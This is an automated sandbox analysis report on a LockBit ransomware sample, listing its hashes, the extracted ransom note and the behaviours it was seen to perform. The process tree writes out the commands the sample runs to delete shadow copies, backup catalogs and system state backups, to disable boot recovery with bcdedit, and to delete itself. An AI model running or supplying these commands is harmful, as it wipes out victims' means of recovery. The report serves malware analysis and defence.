Analysis

  • max time kernel
    72s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-08-2022 19:26

General

  • Target

    b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

  • Size

    81KB

  • MD5

    3ee21dbaa37d0048e2e174cb41a664d6

  • SHA1

    f7799dc7530c3234dd2d5c11b74361b7ec1daefb

  • SHA256

    b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893

  • SHA512

    7cfcc286522cc1d70f4f0d83e8a6e9ed27a7b94ead3f272a271ce1bf6708c91b0f19ddbf7cdebe44239c903142bd8f9b1949d17cbce0dd39e9491acb9744e947

  • SSDEEP

    1536:+uBQrT1eLBBdU/1GJj4UgvpedwwtVNUmrTF3MqqU+hV2xQie:+uBUwX0C4Vvs2wT+mr5MqqD/Fi

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! There is only one way to get your files back: 1. Contact with us 2. Send us 1 any encrypted your file and your personal key 3. We will decrypt 1 file for test(maximum file size - 1 MB), its guarantee what we can decrypt your files 4. Pay 5. We send for you decryptor software We accept Bitcoin Attention! Do not rename encrypted files. Do not try to decrypt using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price(they add their fee to our) Contact information: [email protected] Be sure to duplicate your message on the e-mail: [email protected] Your personal id: �iWZuyP7ksR1Dh7AUQsobNSR01MgVTLtA2LqvnBDjLUDRgCze3ZT/+vRJCA4Oy8nX 6ZIwIhvr29lEG8CE9LjB7TsMiKpqXp5oeBdq0ut9gGUbUYJXLrkErCdHmEnc9var DiJCJ73OFL2eFytIWWY/MV3lli3E7teh6QdzYazYG34ODSUu8UKSVUBfr6qIAUUA krCL9GIYdUA+BoDFEludWqgGAa/ZlsBvGHGhR8/hJBneEY3eKIZJNMHHKVJCwnYp jp2C7igsls8c7H2k53ddsmpFM9oftSvK+g67olChGiKnuHVojfe09xq/OG5uogkI a3KV5DBtZ6g0tkSt93aH/WqiyvxoRGJWKVoxOXz9oo5I10Pm1tdFjc/BBWX8mEsd KN1qrZRsIIbJ0+vOJYK9F6VZfD0hPTiqxvijv7tC5BLCXMin+2QoRrykzC6idi+a Sw11hnowI3FyJC9GpJj7G4YhHFBvL/cckdsaCc430D+TMjVMgqHuoUN75Lnzohi2 crWw+SAXOwk+DmRZ2KpPMgoIjRrLHiuReLN5ekKNii/E6fo19o5AGH3r9cYYh1XH sVf3ib7e8+TM4C0jLsawCgTYispQ8RD9WrNCF9sgoW/FYM8PFQIbDjUBTpfmNRR7 9kZafCdzaLsDdqn2/1qXO05MULT8BeF7239FwWc8tNNRoLDhgXlKob7X4GqrCB3N 6ezZobJC6fkG2Cbt6xfgM9Hj4Qxzagbmvy5YrXfC1yls80K2Du+8XsGdWiOaSouY QShfGxp/CKjdiZSFV/25FgQEjdi7HKrbdGY1NC9T4Ho7789kz/KJMsHEwlnzrajD MSICVv4IwvZo1zYB6PhkdnfqxScaoR9YVi3C/1D/uznVFFMK2bW7LCAWCto0d996 Kp/oameloWu3Qt4iBHSBbmF8QPfLXHVitVQmZtmJyxesOr5bwUGx9JmkTAbuD5LY 73kqH5QETaGTAqTkEUbHrAiyWvCMgRjSWArqzpe2ykWtnG4/iubB2M7/ylieVnLo XOptqZeZOBa2T0EZHqi1QQKwVqYgkJ9jnpfPjdAprUpLHsxmmMSWuLmnJ6PePdQR ccWhqJFD+4JGF6NVXQC5wj3ZAoLHCHEgD5zdwnuepn3RNtEqYtxyrdyecIcGh/ZA qPif6fifCEKHj7wTNGnrb8m39Hgcha3+pM06cYIjhjk+f0yOOUG54Bd6Zpft2Jyy rFd5kBw2KYELSNXxLF7G7PO75FgfPMd++DDvZHoMEHGCuj5eziNOzejfyj+/kE6F xqyb7iZQvGSvykx201RN+pWQG3zmWmPrTK4dPH1aW6vL+uGP1R9kiKuKL510HYDg Iiptsc1KC8FQutx7XchkW3n4pRjKmVCs34uosmLjgKbp77q3VtA+8waqvm+CgBlS CFPJSDdCbFeX0z16DoNa2EGTfdemEwkJbfA7yIBJtQrFjKUhH1pZV2zTQc7jMRvF thcz4Cwl5J2rjf1r3gE02jQ5pX/UZtGyT8TL3zjPLYw9ZpbJkeC6o4lravEWu8C3 l3ByS2Vn+Vf+knqBLc5oHdXKrA1heKDskvZ5USTr9mGgIC1e0ncEmKCQ19TaDvTU viSCa7LkQNePBivutd7spGuzSgcTT6EV2X32ONt7OotvFW0VZXUchFmJVm9MZCVO SPlARno1ypvo7GueAHyZWAV/PcKiWnCmpakk19p0yrM=

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
  • Deletes System State backups 3 TTPs 6 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
    "C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2508
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2996
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2636
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2652
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:2708
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Interacts with shadow copies
      PID:2656
    • C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} recoveryenabled No
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2748
    • C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2780
    • C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      • Deletes System State backups
      • Drops file in Windows directory
      PID:2812
    • C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
      • Deletes System State backups
      • Drops file in Windows directory
      PID:2888
    • C:\Windows\System32\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Interacts with shadow copies
      PID:2516
    • C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} recoveryenabled No
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2812
    • C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2928
    • C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      • Deletes System State backups
      • Drops file in Windows directory
      PID:2984
    • C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
      • Deletes System State backups
      • Drops file in Windows directory
      PID:2864
    • C:\Windows\System32\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      2⤵
        PID:3016
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        2⤵
        • Interacts with shadow copies
        PID:1700
      • C:\Windows\system32\bcdedit.exe
        bcdedit.exe /set {default} recoveryenabled No
        2⤵
        • Modifies boot configuration data using bcdedit
        PID:1444
      • C:\Windows\system32\bcdedit.exe
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        2⤵
        • Modifies boot configuration data using bcdedit
        PID:1000
      • C:\Windows\system32\wbadmin.exe
        wbadmin DELETE SYSTEMSTATEBACKUP
        2⤵
        • Deletes System State backups
        • Drops file in Windows directory
        PID:2676
      • C:\Windows\system32\wbadmin.exe
        wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
        2⤵
        • Deletes System State backups
        • Drops file in Windows directory
        PID:2900
      • C:\Windows\System32\Wbem\wmic.exe
        wmic.exe SHADOWCOPY /nointeractive
        2⤵
          PID:2972
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe"
          2⤵
          • Deletes itself
          PID:2704
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 20
            3⤵
            • Runs ping.exe
            PID:3016
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2544
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
          PID:2756
        • C:\Windows\System32\vdsldr.exe
          C:\Windows\System32\vdsldr.exe -Embedding
          1⤵
            PID:2788
          • C:\Windows\System32\vds.exe
            C:\Windows\System32\vds.exe
            1⤵
              PID:2820

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1000-80-0x0000000000000000-mapping.dmp

            • memory/1164-55-0x0000000000000000-mapping.dmp

            • memory/1244-54-0x0000000075451000-0x0000000075453000-memory.dmp

              Filesize

              8KB

            • memory/1444-79-0x0000000000000000-mapping.dmp

            • memory/1700-78-0x0000000000000000-mapping.dmp

            • memory/2508-56-0x0000000000000000-mapping.dmp

            • memory/2516-66-0x0000000000000000-mapping.dmp

            • memory/2636-67-0x0000000000000000-mapping.dmp

            • memory/2652-68-0x0000000000000000-mapping.dmp

            • memory/2656-57-0x0000000000000000-mapping.dmp

            • memory/2676-81-0x0000000000000000-mapping.dmp

            • memory/2704-86-0x0000000000000000-mapping.dmp

            • memory/2708-69-0x0000000000000000-mapping.dmp

            • memory/2748-58-0x0000000000000000-mapping.dmp

            • memory/2780-59-0x0000000000000000-mapping.dmp

            • memory/2812-61-0x000007FEFB941000-0x000007FEFB943000-memory.dmp

              Filesize

              8KB

            • memory/2812-71-0x0000000000000000-mapping.dmp

            • memory/2812-60-0x0000000000000000-mapping.dmp

            • memory/2864-75-0x0000000000000000-mapping.dmp

            • memory/2888-62-0x0000000000000000-mapping.dmp

            • memory/2900-83-0x0000000000000000-mapping.dmp

            • memory/2928-72-0x0000000000000000-mapping.dmp

            • memory/2944-64-0x0000000000000000-mapping.dmp

            • memory/2972-85-0x0000000000000000-mapping.dmp

            • memory/2984-73-0x0000000000000000-mapping.dmp

            • memory/2996-65-0x0000000000000000-mapping.dmp

            • memory/3016-77-0x0000000000000000-mapping.dmp

            • memory/3016-87-0x0000000000000000-mapping.dmp